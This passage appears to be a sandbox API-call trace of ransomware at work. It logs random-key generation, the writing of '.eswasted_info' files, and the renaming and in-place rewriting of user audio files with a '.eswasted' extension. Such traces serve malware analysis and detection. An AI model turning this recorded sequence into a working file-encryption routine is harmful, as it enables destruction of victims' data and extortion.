[0079.852] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.852] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.853] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.853] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.861] SetEndOfFile (hFile=0xfc) returned 1 [0079.863] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.863] CloseHandle (hObject=0xfc) returned 1 [0079.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0079.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500030 | out: hHeap=0x4a0000) returned 1 [0079.931] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.932] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.932] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\yQtwGzGXk3Eg.m4a") returned 69 [0079.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x294) returned 0x4ef440 [0079.932] lstrcpyW (in: lpString1=0x4ef4ca, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.932] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.933] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.933] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\yQtwGzGXk3Eg.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yqtwgzgxk3eg.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.939] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.940] SetEndOfFile (hFile=0xfc) returned 1 [0079.940] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.940] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.940] lstrcpyW (in: lpString1=0x4ef4ca, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\yQtwGzGXk3Eg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yqtwgzgxk3eg.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\yQtwGzGXk3Eg.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yqtwgzgxk3eg.m4a.eswasted")) returned 1 [0079.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\yQtwGzGXk3Eg.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yqtwgzgxk3eg.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.941] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.941] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x128fa [0079.941] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x128fa) returned 0xb10000 [0079.941] CloseHandle (hObject=0x100) returned 1 [0079.945] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.946] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.946] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.946] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.947] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.947] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.955] SetEndOfFile (hFile=0xfc) returned 1 [0079.957] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.957] CloseHandle (hObject=0xfc) returned 1 [0079.959] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0079.959] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500118 | out: hHeap=0x4a0000) returned 1 [0079.959] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0079.960] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0079.960] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\YXqzroKT10.wav") returned 67 [0079.960] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4ef440 [0079.960] lstrcpyW (in: lpString1=0x4ef4c6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.960] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.960] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0079.961] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.961] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\YXqzroKT10.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yxqzrokt10.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0079.961] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.963] SetEndOfFile (hFile=0xfc) returned 1 [0079.963] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.963] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.963] lstrcpyW (in: lpString1=0x4ef4c6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\YXqzroKT10.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yxqzrokt10.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\YXqzroKT10.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yxqzrokt10.wav.eswasted")) returned 1 [0079.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\YXqzroKT10.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\yxqzrokt10.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.964] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.964] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x2baf [0079.964] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2baf) returned 0x2d0000 [0079.964] CloseHandle (hObject=0x118) returned 1 [0079.966] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0079.967] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.967] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.967] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0079.967] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0079.967] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.976] SetEndOfFile (hFile=0xfc) returned 1 [0080.001] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.001] CloseHandle (hObject=0xfc) returned 1 [0080.010] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.010] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fa028 | out: hHeap=0x4a0000) returned 1 [0080.010] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.011] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.011] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h raKWBU-x1 htBsNV.wav") returned 62 [0080.011] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4ef440 [0080.011] lstrcpyW (in: lpString1=0x4ef4bc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.011] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.011] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.012] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.012] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h raKWBU-x1 htBsNV.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h rakwbu-x1 htbsnv.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.012] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.013] SetEndOfFile (hFile=0xfc) returned 1 [0080.013] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.013] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.013] lstrcpyW (in: lpString1=0x4ef4bc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h raKWBU-x1 htBsNV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h rakwbu-x1 htbsnv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h raKWBU-x1 htBsNV.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h rakwbu-x1 htbsnv.wav.eswasted")) returned 1 [0080.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h raKWBU-x1 htBsNV.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h rakwbu-x1 htbsnv.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.014] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.014] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x135d9 [0080.014] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x135d9) returned 0xb10000 [0080.014] CloseHandle (hObject=0x100) returned 1 [0080.018] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.019] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.019] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.019] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.020] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.020] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.028] SetEndOfFile (hFile=0xfc) returned 1 [0080.031] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.031] CloseHandle (hObject=0xfc) returned 1 [0080.034] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.034] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2458 | out: hHeap=0x4a0000) returned 1 [0080.034] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.035] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.035] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HYuvzvX4EUoELA6A A.wav") returned 62 [0080.035] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4ef440 [0080.035] lstrcpyW (in: lpString1=0x4ef4bc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.035] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.035] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.036] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.036] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HYuvzvX4EUoELA6A A.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hyuvzvx4euoela6a a.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.054] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.056] SetEndOfFile (hFile=0xfc) returned 1 [0080.056] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.056] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.056] lstrcpyW (in: lpString1=0x4ef4bc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HYuvzvX4EUoELA6A A.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hyuvzvx4euoela6a a.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HYuvzvX4EUoELA6A A.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hyuvzvx4euoela6a a.wav.eswasted")) returned 1 [0080.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HYuvzvX4EUoELA6A A.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hyuvzvx4euoela6a a.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.057] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.058] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.059] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.059] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.059] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.060] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.060] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.068] SetEndOfFile (hFile=0xfc) returned 1 [0080.070] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.070] CloseHandle (hObject=0xfc) returned 1 [0080.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.072] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.073] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.073] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IMnRLBRgiWlIaHjX1Y.m4a") returned 62 [0080.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4ef440 [0080.073] lstrcpyW (in: lpString1=0x4ef4bc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.073] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.074] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.074] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IMnRLBRgiWlIaHjX1Y.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imnrlbrgiwliahjx1y.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.074] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.075] SetEndOfFile (hFile=0xfc) returned 1 [0080.075] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.075] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.075] lstrcpyW (in: lpString1=0x4ef4bc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IMnRLBRgiWlIaHjX1Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imnrlbrgiwliahjx1y.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IMnRLBRgiWlIaHjX1Y.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imnrlbrgiwliahjx1y.m4a.eswasted")) returned 1 [0080.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IMnRLBRgiWlIaHjX1Y.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imnrlbrgiwliahjx1y.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.076] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.077] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.078] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.078] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.078] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.079] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.079] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.120] SetEndOfFile (hFile=0xfc) returned 1 [0080.122] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.122] CloseHandle (hObject=0xfc) returned 1 [0080.124] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.124] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.125] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.125] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pMaybXA3lQJg.wav") returned 56 [0080.125] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4d8aa8 [0080.125] lstrcpyW (in: lpString1=0x4d8b18, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.125] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.125] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, 